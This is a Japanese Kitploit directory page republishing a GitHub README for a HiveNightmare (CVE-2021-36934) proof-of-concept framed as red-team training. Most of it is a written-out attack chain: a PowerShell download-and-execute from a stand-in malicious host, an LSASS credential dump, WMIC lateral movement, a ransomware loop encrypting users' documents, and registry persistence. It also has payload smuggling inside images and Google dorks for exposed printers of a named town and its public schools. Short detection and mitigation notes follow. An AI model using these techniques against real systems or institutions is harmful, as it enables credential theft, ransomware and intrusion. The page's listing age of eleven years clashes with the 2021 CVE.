Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Why-so-Serious-SAM — CVE-2021-36934(シャドウコピーに対する不適切なACL)のエクスプロイトを使用し、Windows 10/11上でLOLBinsを用いたファイルレスなレッドチーム手法でSYSTEMハイブとSAMハイブを抽出して、ローカルのNTLMハッシュを取得するPoCマルウェア。 | Kitploit
ツール/GitHubGitHub/p1rat3r00t/why-so-serious-sam
特権昇格エクスプロイト横移動ポストエクスプロイトCTFペネトレーションテスト学習と教育レッドチーミングラボと実践
GitHubp1rat3r00t/why-so-serious-sam

Why-so-Serious-SAM

CVE-2021-36934(シャドウコピーに対する不適切なACL)のエクスプロイトを使用し、Windows 10/11上でLOLBinsを用いたファイルレスなレッドチーム手法でSYSTEMハイブとSAMハイブを抽出して、ローカルのNTLMハッシュを取得するPoCマルウェア。

11年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
ウェブサイト

HiveNightmare 'Fileless' Exploit PoC:

Screenshot 2025-05-21 001453


目次

  • 概要
  • 特徴
  • ラボシミュレーション例
  • Google Dorks を使った偵察
  • LOLBins の概要
  • ファイルレスドロッパーの埋め込み
  • Print Spooler と HiveNightmare の悪用
  • リフレクティブ DLL インジェクション
  • MITRE ATT&CK マッピング
  • 検知と緩和策
  • 法的免責事項
  • 参考情報と関連資料

概要

CVE-2021-36934/HiveNightmare は、Windows 11 上で ファイルレスマルウェア 攻撃フレームワークをシミュレートする、教育目的のレッド/パープルチーム研究プロジェクトです。MITRE ATT&CK の手法を用いて、ステルス性の高いファイルレス操作を中心とした、現実世界の敵対的キルチェーンをエミュレートできます。

警告: 隔離されたラボ環境での研究・訓練のみを目的としています。本番環境や許可のないシステムでは使用しないでください。


特徴

  • ファイルレスランサムウェア/ワイパーウェア攻撃のエンドツーエンドシミュレーション
  • Living Off the Land Binaries (LOLBins) の使用例を示す
  • 認証情報へのアクセス、権限昇格、横展開、永続化を実演
  • 実践的なラボおよび偵察の例を収録
  • ブルーチームの検知演習のための MITRE ATT&CK マッピング

ラボシミュレーション例

次の PowerShell シミュレーションは、Windows 標準ツール (LOLBins) を使った典型的なファイルレスランサムウェア攻撃チェーンを示しています。

root@kitploit:~
# Initial Access: Load dropper
IEX(New-Object Net.WebClient).DownloadString("http://malicious.com/dropper.ps1")

# Execution: Decode and load in-memory payload
$bytes = [System.Convert]::FromBase64String("[Base64Payload]") 
[System.Reflection.Assembly]:https://raw.githubusercontent.com/p1rat3r00t/why-so-serious-sam/HEAD/:Load($bytes)

# Privilege Escalation
Start-Process powershell -Args "-ExecutionPolicy Bypass -File C:\Temp\elevate.ps1" -Verb RunAs

# Credential Access
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id C:\Temp\lsass.dmp full

# Lateral Movement
wmic /node:targetPC process call create "powershell.exe -File \\share\payload.ps1"

# File Encryption Example
$files = Get-ChildItem -Path "C:\Users\*\Documents" -Include *.docx,*.pdf -Recurse
foreach ($file in $files) {
  $data = Get-Content $file.FullName -Raw
  $aes = New-Object System.Security.Cryptography.AesManaged
  $aes.Key = [Text.Encoding]::UTF8.GetBytes("RANDOM-GEN-KEY-1234567890123456")
  $aes.IV = New-Object byte[] 16
  $enc = $aes.CreateEncryptor().TransformFinalBlock([Text.Encoding]::UTF8.GetBytes($data), 0, $data.Length)
  Set-Content -Path $file.FullName -Value ([Convert]::ToBase64String($enc))
}

# Persistence
Set-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "ransomware" -Value "powershell -File C:\Temp\persist.ps1"

Google Dorks を使った偵察

目標例: ミズーリ州モベリーにある、PrintNightmare などのエクスプロイトに対して潜在的に脆弱な、公開されたプリンターサービスを特定する。

Google Dork クエリの例:

root@kitploit:~
inurl:"/hp/device/this.LCDispatcher" "Moberly"
intitle:"Printer Status" "Moberly Public Schools"
intitle:"Web Image Monitor" inurl:"/wim" "Moberly"
inurl:"/printer/main.html" "City of Moberly"
intitle:"Web Jetadmin" "Moberly"
inurl:"/printers/" "Moberly"
inurl:"/PPS/public/" "Moberly"
intitle:"Konica Minolta" inurl:"/wcd/" "Moberly"
intitle:"PaperCut MF" "Moberly"
intitle:"Lexmark" inurl:"/printer/" "Moberly"
intitle:"Canon Remote UI" "Moberly"
intitle:"EpsonNet Config" "Moberly"

LOLBins の概要

Living Off the Land Binaries (LOLBins) とは、正規で信頼された Windows バイナリであり、セキュリティ対策を回避して悪意のあるコードをファイルレスで実行するために、攻撃者によく悪用されます。

使用例 (印刷サービス攻撃):

root@kitploit:~
rundll32.exe \\10.10.X.X\shared\payload.dll,ReflectEntry

攻撃者は rundll32.exe、regsvr32.exe、powershell.exe などの LOLBins を使ってネットワーク共有からペイロードを実行します。多くの場合、偵察によって露出したプリンターやサーバーを特定した後に行われます。


ファイルレスドロッパーの埋め込み

目的: アーカイブを画像内に埋め込み、ネイティブツールで抽出することで、ペイロードをこっそり配信する。

手順:

  1. ペイロードを埋め込む:

    root@kitploit:~
    copy /b nsfw.jpg + payload.7z nsfw.jpg
    
  2. 抽出してデコードする:

    root@kitploit:~
    certutil -decode nsfw.jpg dropper.7z
    7z x dropper.7z -oC:\Users\Public\
    

この方法は、従来のファイル拡張子フィルタリングを回避し、回避型配信のために内蔵ツールを活用します。


リフレクティブ DLL インジェクション

手法: リフレクティブローディングを使用して、悪意のある DLL をメモリ内で直接ロードし実行する。

例:

root@kitploit:~
rundll32.exe \\10.10.X.X\share\nsfw.dll,ReflectEntry

これにより、ディスク上に痕跡を残さない、ステルス性の高いインメモリ実行が可能になります。


MITRE ATT&CK マッピング


検知と緩和策

検知

  • Sysmon + Sigma ルール:

    • 非システム DLL をロードする rundll32.exe を監視する
    • certutil.exe、regsvr32.exe、mshta.exe の異常な使用を監視する
    • 非管理者によるシャドウボリュームへのアクセスを追跡する
  • SIEM の例 (ELK/Splunk):

    • 公開共有からの実行に対するアラート
    • 親/子プロセスの異常 (例: explorer.exe が rundll32.exe を起動する)
    • PowerShell または CMD での疑わしいエンコード済みコマンド

緩和策

  • 不要な場合は Print Spooler を無効化する:
    root@kitploit:~
    Stop-Service -Name Spooler -Force
    Set-Service -Name Spooler -StartupType Disabled
    
  • すべてのセキュリティパッチを適用し、ACL を強化する
  • AppLocker または WDAC で LOLBins をブロックまたは制限する
  • リフレクティブ DLL ロードやインメモリ攻撃を検知する EDR ソリューションを使用する

法的免責事項

このリポジトリのすべてのコンテンツ、コード、手法は、教育および許可を得たペネトレーションテストのみを目的としています。管理された隔離環境の外で、明示的な許可なしにこのプロジェクトの一部を使用しないでください。作成者は誤用に対する責任を負いません。


参考情報と関連資料

  • LOLOL Farm – LOLBin Playground
  • LOLGEN – Generate LOLBin Chains
  • Detecting SeriousSam
  • DLL Injection Primer
  • Print Spooler Exploit Chain
  • Fileless Malware – Wikipedia
  • PrintSpoofer (Original)
  • HiveNightmare
  • Mitre Attck T1055
  • Hivenightmare demo

安全に保ち、責任を持って研究し、常に合法かつ倫理的な方法で使用してください。

ツールをダウンロード
フェーズ手法ID説明
初期アクセス有効なアカウント / ドライブバイ侵害T1078, T1189公開された印刷インターフェースの侵害
実行DLL サイドローディング / LOLBinsT1218, T1055.001信頼されたバイナリを介した DLL のリフレクティブ実行
権限昇格Print Spooler エクスプロイト / Hive ACL 悪用T1068, T1003.002SYSTEM レベルのアクセスと SAM ハッシュの抽出
防御回避ファイルレス実行 / 難読化ファイルT1027, T1202certutil、mshta などを介して配信されるエンコード済みペイロード
認証情報へのアクセスLSASS ダンプ / SAM ハイブへのアクセスT1003HiveNightmare 後の認証情報ダンプ
横展開SMB/ネットワーク共有の列挙T1021.002プリンター共有またはスプーラー列挙を介した拡散
影響データ破壊 / 暗号化T1485, T1486DLL ペイロードを介してトリガーされるファイルレスワイパーウェア